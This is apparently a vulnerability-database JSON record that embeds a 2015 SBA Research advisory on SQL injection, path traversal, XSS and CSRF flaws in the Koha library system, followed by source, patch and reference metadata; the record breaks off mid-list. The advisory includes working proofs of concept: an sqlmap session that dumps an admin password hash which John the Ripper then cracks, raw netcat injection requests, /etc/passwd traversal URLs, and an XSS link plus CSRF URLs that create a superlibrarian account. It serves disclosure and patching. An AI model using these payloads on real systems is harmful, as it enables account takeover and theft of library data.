===============================================================================================\nSBA Research Vulnerability Disclosure\u00a0\n===============================================================================================\n\ntitle: \t\t\t Koha Unauthenticated SQL injection\nproduct: \t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Koha ILS\naffected version:\t3.20.x \u003c= 3.20.1, 3.18.x \u003c= 3.18.8, 3.16.x \u003c= 3.16.12\nfixed version:\t\t3.20.1, 3.17.8, 3.16.12\nCVE numbers:\tCVE-2015-4633, CVE-2015-4632, CVE-2015-4631\nimpact:\t\t\tcritical\nwebsite:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://www.koha-community.org/\n\nfound by:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Raschin Tavakoli / SBA Research Combinatorial Security Testing Group\ncontact:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0cst@sba-research.org\n\n\nReferences:\t\thttp://koha-community.org/security-release-koha-3-20-1/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-18-8/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-16-12/\n\n\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u200bhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\n\n===============================================================================================\n\n=========================\n1. If the webserver is misconfigured, the file-system may be accessed as well. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n1. Inspect Koha database schema\n\n\u00a0 \u00a0Have a look at how to query the database for superlibrarian users:\n\u00a0 \u00a0http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians\n\n\u00a0 \u00a0So basically we we need to execute some SQL statement like this:\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\n2. Query the database with sqlmap\n\n\u00a0 \u00a0So let\u0027s fire up sqlmap with the --sql-shell parameter and input the query:\n\n\u00a0 \u00a0root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0_\n\u00a0 \u00a0 ___ ___| |_____ ___ ___ \u00a0{1.0-dev-nongit-20150513}\n\u00a0 \u00a0|_ -| . | | \u00a0 \u00a0 | .\u0027| . |\n\u00a0 \u00a0|___|_ \u00a0|_|_|_|_|__,| \u00a0_|\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0|_| \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |_| \u00a0 http://sqlmap.org\n\n\n\u00a0 \u00a0[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0027s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n\u00a0 \u00a0[*] starting at 09:20:07\n\n\n\u00a0 \u00a0[09:20:07] [INFO] testing connection to the target URL\n\u00a0 \u00a0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n\u00a0 \u00a0---\n\u00a0 \u00a0Parameter: number (GET)\n\u00a0 \u00a0 \u00a0 \u00a0Type: AND/OR time-based blind\n\u00a0 \u00a0 \u00a0 \u00a0Title: MySQL \u003e= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)\n\u00a0 \u00a0 \u00a0 \u00a0Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)\n\u00a0 \u00a0---\n\u00a0 \u00a0[09:20:09] [INFO] testing MySQL\n\u00a0 \u00a0[09:20:09] [INFO] confirming MySQL\n\u00a0 \u00a0[09:20:09] [INFO] the back-end DBMS is MySQL\n\u00a0 \u00a0web server operating system: Linux Debian\n\u00a0 \u00a0web application technology: Apache 2.4.10\n\u00a0 \u00a0back-end DBMS: MySQL \u003e= 5.0.0\n\u00a0 \u00a0[09:20:09] [INFO] calling MySQL shell. To quit type \u0027x\u0027 or \u0027q\u0027 and press ENTER\n\n\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\u00a0 \u00a0[09:20:25] [INFO] fetching SQL SELECT statement query output: \u0027select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1\u0027\n\u00a0 \u00a0[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind\n\u00a0 \u00a0[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\n\u00a0 \u00a0[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors\u00a0\n\u00a0 \u00a0admin\n\u00a0 \u00a0[09:21:46] [INFO] retrieved: $2a$08$taQ\n\u00a0 \u00a0[09:23:33] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:23:33] [WARNING] increasing time delay to 5 seconds\u00a0\n\u00a0 \u00a0afOgEEhU\n\u00a0 \u00a0[09:25:10] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:25:10] [WARNING] increasing time delay to 6 seconds\u00a0\n\u00a0 \u00a0t/gW\n\u00a0 \u00a0[09:26:13] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:26:13] [WARNING] increasing time delay to 7 seconds\u00a0\n\u00a0 \u00a0TOmqnYe1Y6ZNxCENa\n\u00a0 \u00a0[09:29:57] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:29:57] [WARNING] increasing time delay to 8 seconds\u00a0\n\u00a0 \u00a02.ONk2eZhnuEw5z9OjjxS\n\u00a0 \u00a0[09:35:08] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:35:08] [WARNING] increasing time delay to 9 seconds\u00a0\n\n\u00a0 \u00a0select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: \u00a0 \u00a0\n\u00a0 \u00a0\u0027admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\u0027\n\n3. Feed john the ripper and be lucky\n\n\u00a0 \u00a0root@kali:/home/wicked# echo \"$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\" \u003e ./admin-pass\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass\u00a0\n\u00a0 \u00a0Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])\n\u00a0 \u00a0admin \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(?)\n\u00a0 \u00a0guesses: 1 \u00a0time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) \u00a0c/s: 260 \u00a0trying: Smokey - allstate\n\u00a0 \u00a0Use the \"--show\" option to display all of the cracked passwords reliably\n\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass --show\n\u00a0 \u00a0?:admin\n\n\u00a0 \u00a01 password hash cracked, 0 left\n\n4. If the webserver is misconfigured, read \u0026 write access to the filesystem may be possible. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n====================================================================\n1. \"Criteria\" Parameter, Payload: ELT(1=1,\u0027evil\u0027) / ELT(1=2,\u0027evil\u0027)\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=2,\u0027evil\u0027)\" | nc testbox 9002\n\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=1,\u0027evil\u0027)\" | nc testbox 9002\n\n====================================================================\n2. \"Filter\" Parameter, Payload: P_COM\u0027+AND+\u0027a\u0027=\u0027a / P_COM\u0027+AND+\u0027a\u0027=\u0027b\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027a\" | nc testbox 9002\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027b\" | nc testbox 9002\n\n====================================================================\n\nYou will notice different output in every second request, demonstrating the evaluation of the payload. \n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n3. Path Traversal (CVE-2015-4633)\n=================================\n\nVulnerability\n-------------\nThe \"template_path\" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal. \n\nReferences\n----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nThe following input is used to print out /etc/passwd:\n\n/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n4. The site also lacks in the implementation of challenge tokens that prevent cross-site\u00a0\nforgery (XSRF) attacks. \u00a0\n\nThe attack can be performed by:\n\n- through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)\n- through a user clicking a malicious link (phishing mail, forum link etc.)\n\nThe following pages are affected from stored XSS flaws:\n\n/cgi-bin/koha/opac-shelves.pl\n/cgi-bin/koha/virtualshelves/shelves.pl\n\nThe following pages are affected from relfective XSS flaws:\n\n/cgi-bin/koha/opac-shelves.pl \t\t\t\t(parameters: \"direction\", \"display\")\n/cgi-bin/koha/opac-search.pl \t\t\t\t (parameters: \"tag\")\n/cgi-bin/koha/authorities/authorities-home.pl \t\t(parameters: \"value\")\u00a0\n/cgi-bin/koha/acqui/lateorders.pl \t\t\t (parameters: \"delay\")\n/cgi-bin/koha/admin/auth_subfields_structure.pl \t(parameters: \"authtypecode\",\"tagfield\")\n/cgi-bin/koha/admin/marc_subfields_structure.pl\t(parameters: \"tagfield\")\n/cgi-bin/koha/catalogue/search.pl\t\t\t (parameters: \"limit\")\n/cgi-bin/koha/serials/serials-search.pl\t\t\t(parameters: \"bookseller_filter\", \"callnumber_filter\", \"EAN_filter\", \"ISSN_filter\", \"publisher_filter\", \"title_filter\")\u00a0\n/cgi-bin/koha/suggestion/suggestion.pl \t\t\t(parameters: \"author\", \"collectiontitle\", \"copyrightdate\", \"isbn\", \"manageddate_from\", \"manageddate_to\", \"publishercode\", \n \"suggesteddate_from\", \"suggesteddate_to\")\n\nImpact\n----------\nThe vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to:\n\n- escalate privileges by targeting staff members with XSRF\u00a0\n- target users via browser exploits\n- target the webserver by combining with other server-side vulnerabilities. \u00a0\n\nReferences\n----------------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\n# ################################################################################################## #\n# PoC / Attack Scenario: \t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nAlice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:\n\n--\u003e http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=Malicious+Input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0\n\nBob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens\u00a0\n\n--\u003e http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl\n\nthe malcious code get\u0027s executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:\n\nCreate new user:\n-----------------------\n\n--\u003e http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026B_address=\u0026B_address2=\u0026B_city=\u0026B_state=\u0026B_zipcode=\u0026B_country=\u0026B_phone=\u0026B_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress\u0026category_type=A\u0026updtype=I\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2F06%2F2000\u0026address=fictional\u0026select_city=%7C%7C%7C\u0026cardnumber=9182734629182364\u0026branchcode=MAURES\u0026categorycode=P_COM\u0026dateenrolled=24%2F06%2F2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=PROFESSION\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=Save\u0026setting_extended_patron_attributes=1\n\nGive the new user superlibririan permission:\n----------------------------------------------------------\n\n--\u003e http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian\n\nThe attacker can now log as superlibrarian. \n\nSide Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. \nAlice needs to have access to the OPAC interface and to have permissions to create public lists. \n\n# ################################################################################################## #\n# PoC / Attack Scenario End\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n\n\n\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-4633"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008221"
},
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "PACKETSTORM",
"id": "132458"
}
],
"trust": 4.68
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "75426",
"trust": 3.9
},
{
"db": "NVD",
"id": "CVE-2015-4633",
"trust": 2.8
},
{
"db": "PACKETSTORM",
"id": "132458",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "37387",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008221",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2015-05198",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05201",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05199",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05200",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05197",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201512-698",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008221"
},
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-698"
},
{
"db": "NVD",
"id": "CVE-2015-4633"
}
]
},
"id": "VAR-201810-0026",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
}
],
"trust": 3.5804196
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 3.0
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
}
]
},
"last_update_date": "2024-11-23T21:52:48.222000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Bug 14412",
"trust": 0.8,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
},
{
"title": "Bug 14426",
"trust": 0.8,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
},
{
"title": "Koha 3.14.16 released",
"trust": 0.8,
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"title": "Security Release - Koha 3.16.12",
"trust": 0.8,
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"title": "Security Release - Koha 3.18.8",
"trust": 0.8,
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"title": "Security Release - Koha 3.20.1",
"trust": 0.8,
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"title": "Koha directory traversal vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62257"
},
{
"title": "Patch for Koha cross-site request forgery vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62260"
},
{
"title": "Koha HTML Injection Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62258"
},
{
"title": "Patch for Koha Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62259"
},
{
"title": "Patch for Koha SQL Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62255"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008221"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008221"
},
{
"db": "NVD",
"id": "CVE-2015-4633"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.6,
"url": "http://www.securityfocus.com/bid/75426"
},
{
"trust": 2.4,
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"trust": 2.0,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
},
{
"trust": 2.0,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
},
{
"trust": 1.7,
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"trust": 1.7,
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"trust": 1.7,
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"trust": 1.6,
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"trust": 1.6,
"url": "https://packetstormsecurity.com/files/132458/koha-ils-3.20.x-csrf-xss-traversal-sql-injection.html"
},
{
"trust": 1.6,
"url": "https://seclists.org/fulldisclosure/2015/jun/80"
},
{
"trust": 1.6,
"url": "https://www.exploit-db.com/exploits/37387/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4633"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-4633"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
},
{
"trust": 0.3,
"url": "http://koha-community.org/"
},
{
"trust": 0.1,
"url": "http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10"
},
{
"trust": 0.1,
"url": "http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026b_address=\u0026b_address2=\u0026b_city=\u0026b_state=\u0026b_zipcode=\u0026b_country=\u0026b_phone=\u0026b_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026borrowermandatoryfield=surname%7cdateofbirth%7ccardnumber%7caddress\u0026category_type=a\u0026updtype=i\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2f06%2f2000\u0026address=fictional\u0026select_city=%7c%7c%7c\u0026cardnumber=9182734629182364\u0026branchcode=maures\u0026categorycode=p_com\u0026dateenrolled=24%2f06%2f2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=profession\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=save\u0026setting_extended_patron_attributes=1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4631"
},
{
"trust": 0.1,
"url": "http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian"
},
{
"trust": 0.1,
"url": "http://wiki.koha-community.org/wiki/sql_reports_library#superlibrarians"
},
{
"trust": 0.1,
"url": "http://www.koha-community.org/"
},
{
"trust": 0.1,
"url": "http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl"
},
{
"trust": 0.1,
"url": "http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=malicious+input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0"
},
{
"trust": 0.1,
"url": "http://sqlmap.org"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008221"
},
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-698"
},
{
"db": "NVD",
"id": "CVE-2015-4633"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008221"
},
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-698"
},
{
"db": "NVD",
"id": "CVE-2015-4633"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
